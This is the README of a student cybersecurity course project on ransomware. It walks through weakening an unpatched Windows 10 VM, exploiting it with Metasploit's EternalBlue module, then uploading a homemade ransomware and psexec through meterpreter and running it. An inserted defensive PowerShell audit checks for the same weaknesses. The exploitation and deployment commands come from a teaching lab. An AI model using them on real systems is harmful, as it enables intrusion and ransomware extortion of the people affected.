OT9-Ransomwares

This repository hosts all the data linked to an OT9 project, a cybersecurity course at INSA Lyon (5th year, IF Department). The goal is to provide a brief analysis of ransomware (history, state of the art, trends, prevention and recovery), including a small demonstration of the EternalBlue exploit with a small handwritten (and pretty dumb) ransomware.

You will find multiple subprojects:

  • ctrlcmd-server: the server that provides an encryption key to the target; it also emulates the payment of the ransom
  • ransomware: the ransomware itself, a pretty basic one
  • report: the final report (a paper and a defense)

All programs are written in Rust; the paper is written in Typst.

The Demonstration

Here is a recorded demonstration (the demo.webm file in the repository).

Run the demonstration

Build ransomware and ctrlcmd-server

Go into each project folder and run cargo build with the following commands:

  • cargo build --release for the ctrlcmd-server
  • cargo build --target x86_64-pc-windows-gnu --release for the ransomware (it will run on the target, a Windows 10 VM)

Target

  • Start a Windows VM (it even works with the firewall enabled); it must be an unpatched version (I use a 1507)
  • You may want to open gpedit.msc, go to Computer Configuration\Windows Settings\Security Settings\Local Policies\Security Options, edit 'Network access: Shares that can be accessed anonymously' and add " \ " to the empty list
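
The Target steps above deliberately weaken the VM so that the demonstration works. As an added example (not part of the OT9-Ransomwares project), the following PowerShell audit reports, read-only, whether a Windows 10 host still has those preconditions: an old build, the SMBv1 server enabled, anonymous (null-session) shares, and SMB listening on TCP 445. The cmdlets and registry paths are standard Windows ones; the function name, the output fields and the "looks like the demo target" verdict are my own.

```powershell
# Added example, not part of the OT9-Ransomwares project: a read-only audit of the
# host-side preconditions the "Target" steps rely on. Run it in an elevated
# PowerShell session on the Windows VM; it reports and changes nothing.
#
# Assumptions (mine, not the README's): Windows 10 with the SmbShare and NetTCPIP
# modules present, and the standard registry locations named below.

function Test-DemoPreconditions {
    [CmdletBinding()]
    param()

    $findings = New-Object System.Collections.Generic.List[string]

    # 1. Release and build. Build 10240 is the 1507 release the README uses.
    $cv = Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion'
    $build = [int]$cv.CurrentBuildNumber
    if ($build -le 10240) {
        $findings.Add("Old Windows 10 build ($build); verify that the MS17-010 update is installed.")
    }

    # 2. SMBv1 server. EternalBlue targets the SMBv1 implementation, so SMBv1 being
    #    enabled is the single most important precondition.
    $smb = Get-SmbServerConfiguration
    if ($smb.EnableSMB1Protocol) {
        $findings.Add('SMBv1 server protocol is enabled (MS17-010 attack surface).')
    }

    # 3. Anonymous (null-session) shares. The gpedit policy
    #    "Network access: Shares that can be accessed anonymously" is stored in
    #    this REG_MULTI_SZ value; an empty list is the secure default.
    $lanman = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'
    $nullShares = (Get-ItemProperty -Path $lanman -Name NullSessionShares -ErrorAction SilentlyContinue).NullSessionShares
    $nullShares = @($nullShares | Where-Object { $_ -ne '' })
    if ($nullShares.Count -gt 0) {
        $findings.Add("Anonymous share access is allowed for: $($nullShares -join ', ')")
    }

    # 4. Is the SMB service listening at all? (TCP 445)
    $listen = Get-NetTCPConnection -LocalPort 445 -State Listen -ErrorAction SilentlyContinue
    if ($listen) {
        $findings.Add('SMB is listening on TCP 445.')
    }

    # 5. Most recent security updates, so the MS17-010 update can be checked by eye.
    #    The KB number depends on the Windows 10 release; look it up in the MS17-010
    #    bulletin rather than hard-coding one here.
    $updates = Get-HotFix |
        Where-Object { $_.Description -eq 'Security Update' } |
        Sort-Object InstalledOn -Descending |
        Select-Object -First 5 HotFixID, InstalledOn

    [pscustomobject]@{
        Build               = $build
        Smb1Enabled         = [bool]$smb.EnableSMB1Protocol
        NullSessionShares   = $nullShares
        SmbListening        = [bool]$listen
        RecentUpdates       = $updates
        Findings            = $findings.ToArray()
        # "Looks exposed" is a heuristic from the checks above, not a proof of exploitability.
        LooksLikeDemoTarget = ($findings.Count -gt 0)
    }
}

# Usage: a non-empty Findings list means the host still looks like the demo target.
Test-DemoPreconditions | Format-List
```

On anything that is not a disposable lab VM, the fixes for the findings this prints are the usual ones: disable the SMBv1 server with Set-SmbServerConfiguration -EnableSMB1Protocol $false -Force, leave the anonymous-shares policy empty, and install the MS17-010 update for the release in use.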

CtrlCmd

  • Start the ctrlcmd server using ./ctrlcmd-server/target/release/ctrlcmd-server

Exegol

  • Copy the ransomware to your Exegol workspace (i.e. cp ransomware/target/x86_64-pc-windows-gnu/release/ransomware.exe $HOME/.exegol/workspaces/default/ransomware.exe)
  • Start the Exegol environment using exegol start (I use the nightly image with default settings)
  • Start Metasploit with msfconsole
  • Search for the EternalBlue exploit with search eternalblue; it will output something like:
Matching Modules
================
   #   Name                                           Disclosure Date  Rank     Check  Description
   -   ----                                           ---------------  ----     -----  -----------
   0   exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1     \_ target: Automatic Target                  .                .        .      .
   2     \_ target: Windows 7                         .                .        .      .
   3     \_ target: Windows Embedded Standard 7       .                .        .      .
   4     \_ target: Windows Server 2008 R2            .                .        .      .
   5     \_ target: Windows 8                         .                .        .      .
   6     \_ target: Windows 8.1                       .                .        .      .
   7     \_ target: Windows Server 2012               .                .        .      .
   8     \_ target: Windows 10 Pro                    .                .        .      .
   9     \_ target: Windows 10 Enterprise Evaluation  .                .        .      .
  • You can now select the right exploit module using use exploit/windows/smb/ms17_010_eternalblue
  • Set the target port with set RPORT 44500 (the default is 445; changed it to accommodate some constraints)
  • Set the target address to localhost with set RHOST 127.0.0.1
  • Then simply run it using exploit

You should now be in meterpreter! Congratulations, you are your target's admin!

  • Use getuid to check that you are AUTHORITY
  • Upload the ransomware using upload ransomware.exe c:\\windows\\system32
  • Upload psexec using upload psexec.exe c:\\windows\\system32
  • Finally, execute the ransomware: shell, then psexec -i 1 C:\Windows\system32\ransomware.exe (runs it interactively in the user session)
  • When ready, change the message on the ctrlcmd server to something that contains paid